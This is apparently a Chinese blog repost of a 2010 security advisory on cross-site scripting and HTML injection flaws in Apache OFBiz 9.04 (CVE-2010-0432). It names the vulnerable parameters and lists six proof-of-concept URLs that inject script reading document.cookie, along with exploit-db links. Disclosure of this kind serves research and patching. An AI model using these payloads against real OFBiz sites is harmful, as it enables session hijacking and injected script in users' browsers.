再来一个 吊爆了 OfBiz的XSS漏洞

Apache OFBiz多个跨站脚本和HTML注入漏洞

发布日期:2010-04-14
更新日期:2010-04-16

受影响系统:
Apache Group OfBiz 9.04
描述: BUGTRAQ  ID: 39489
CVE ID: CVE-2010-0432

Apache Open For Business(Apache OFBiz)是开源的ERP系统。

Apache OFBiz没有正确地过滤提交给Export Product Listing部分的productStoreId参数、提交给View Profile部分的partyId参数、提交给Show Portal Page部分的start参数、提交给ecommerce/control/ViewBlogArticle的contentId参数和提交给Web Tools部分的entityName参数,这可能导致多个跨站脚本漏洞。

此外由于没有正确地过滤提交给ecommerce/control/contactus部分的subject和content参数,远程攻击者可以通过提交恶意HTTP请求导致注入恶意脚本,并在用户浏览器中查看时执行所注入的脚本代码。

<*来源:Lucas Apa
  
  链接: http://secunia.com/advisories/39460/
         http://marc.info/?l=bugtraq&m=127135631208190&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

https://www.example.com/ebaystore/control/exportProductListing?productStoreId=90100&quot; style=&quot;width:100%25;height:100%25;display:block;position:absolute;top:0px;left:0px&quot; onMouseOver=&quot;alert(document.cookie)l

https://www.example.com/partymgr/control/viewprofile?&amp;partyId=aa&quot; style=&quot;width:100%25;height:100%25;display:block;position:absolute;top:0px;left:0px&quot; onMouseOver=&quot;alert(document.cookie)

https://www.example.com/myportal/control/showPortalPage?period=week &amp;start=1266796800000\&lt;script&gt;alert(document.cookie)&lt;/script&gt;

https://www.example.com/facility/control/ReceiveReturn&quot;&lt;b&gt;&lt;body onLoad=&quot;alert(document.cookie)&quot;&gt;&lt;br&gt;&lt;div&gt;&gt;&lt;!--

http://www.example.com/ecommerce/control/ViewBlogArticle?contentId=BLG10000\&lt;script&gt; alert(document.cookie)&lt;/script&gt;&amp;blogContentId=BLOGROOTBIGAL

https://www.example.com/webtools/control/FindGeneric?entityName=AccommodationClass\&lt;script&gt; alert(document.cookie)&lt;/script&gt;&amp;find=true&amp;VIEW_SIZE=50&amp;VIEW_INDEX=0

http://www.exploit-db.com/exploits/12264
http://www.exploit-db.com/download/12263

你可能感兴趣的:(再来一个 吊爆了 OfBiz的XSS漏洞)